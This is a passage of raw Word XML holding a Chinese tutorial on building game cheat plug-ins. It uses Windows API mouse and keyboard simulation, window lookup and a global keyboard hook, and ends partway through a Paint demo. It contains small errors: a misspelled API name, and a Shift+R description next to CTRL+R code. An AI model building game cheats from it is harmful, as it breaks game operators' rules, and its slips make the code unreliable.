          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lpPoint // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回鼠标的当前位置。</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BOOL SetCursorPos(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int X, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标的水平方向位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int Y //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标的垂直方向位置。</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通常游戏角色的行走都是通过鼠标移动至目的地，然后按一下鼠标的按钮就搞定了。下面我们使用上面介绍的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来模拟角色行走过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPoint oldPoint,newPoint;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetCursorPos(&amp;oldPoint); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存当前鼠标位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>newPoint.x = oldPoint.x+40;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>newPoint.y = oldPoint.y+10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetCursorPos(newPoint.x,newPoint.y); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置目的地位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟按下鼠标右键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟放开鼠标右键。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键盘模拟技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在很多游戏中，不仅提供了鼠标的操作，而且还提供了键盘的操作，在对攻击对象进行攻击时还可以使用快捷键。为了使这些攻击过程能够自动进行，外挂程序需要使用键盘模拟技术。像鼠标模拟技术一样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也提供了一系列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来完成对键盘动作的模拟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　模拟键盘动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keydb_event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它可以模拟对键盘上的某个或某些键进行按下或放开的动作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VOID keybd_event(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BYTE bVk, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟键值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BYTE bScan, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬件扫描码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DWORD dwFlags, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动作标识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DWORD dwExtraInfo // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与键盘动作关联的辅加信息。</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其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bVk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示虚拟键值，其实它是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BYTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型值的宏，其取值范围为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1-254</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。有关虚拟键值表请在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上使用关键字“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Virtual-Key Codes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”查找相关资料。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示当键盘上某键被按下和放开时，键盘系统硬件产生的扫描码，我们可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MapVirtualKey()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数在虚拟键值与扫描码之间进行转换。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dwFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示各种各样的键盘动作，它有两种取值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KEYEVENTF_EXTENDEDKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KEYEVENTF_KEYUP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　下面我们使用一段代码实现在游戏中按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shift+R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快捷键对攻击对象进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keybd_event(VK_CONTROL,MapVirtualKey(VK_CONTROL,0),0,0); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CTRL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keybd_event(0x52,MapVirtualKey(0x52,0),0,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keybd_event(0x52,MapVirtualKey(0x52,0), KEYEVENTF_KEYUP,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">keybd_event(VK_CONTROL,MapVirtualKey(VK_CONTROL,0), </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KEYEVENTF_KEYUP,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CTRL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>激活外挂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　上面介绍的鼠标和键盘模拟技术实现了对游戏角色的动作部分的模拟，但要想外挂能工作于游戏之上，还需要将其与游戏的场景窗口联系起来或者使用一个激活键，就象按键精灵的那个激活键一样。我们可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetWindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来枚举窗口，也可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Findwindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来查找特定的窗口。另外还有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindWindowEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数可以找到窗口的子窗口，当游戏切换场景的时候我们可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindWindowEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来确定一些当前窗口的特征，从而判断是否还在这个场景，方法很多了，比如可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetWindowInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来确定一些东西，比如当查找不到某个按钮的时候就说明游戏场景已经切换了等等办法。当使用激活键进行关联，需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术开发一个全局键盘钩子，在这里就不具体介绍全局钩子的开发过程了，在后面的实例中我们将会使用到全局钩子，到时将学习到全局钩子的相关知识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goodmorning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏外挂设计技术探讨②</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　通过上面的学习，我们已经基本具备了编写动作式游戏外挂的能力了。下面我们将创建一个画笔程序外挂，它实现自动移动画笔字光标的位置并写下一个红色的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”字。以这个实例为基础，加入相应的游戏动作规则，就可以实现一个完整的游戏外挂。这里作者不想使用某个游戏作为例子来开发外挂（因没有游戏商家的授权啊！），如读者感兴趣的话可以找一个游戏试试，最好仅做测试技术用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先，我们需要编写一个全局钩子，使用它来激活外挂，激活键为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。创建全局钩子步骤如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MFC AppWizard(DLL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MFC Extension DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（共享</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MFC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拷贝）类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入新文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.h</w:t>
      </w:r>
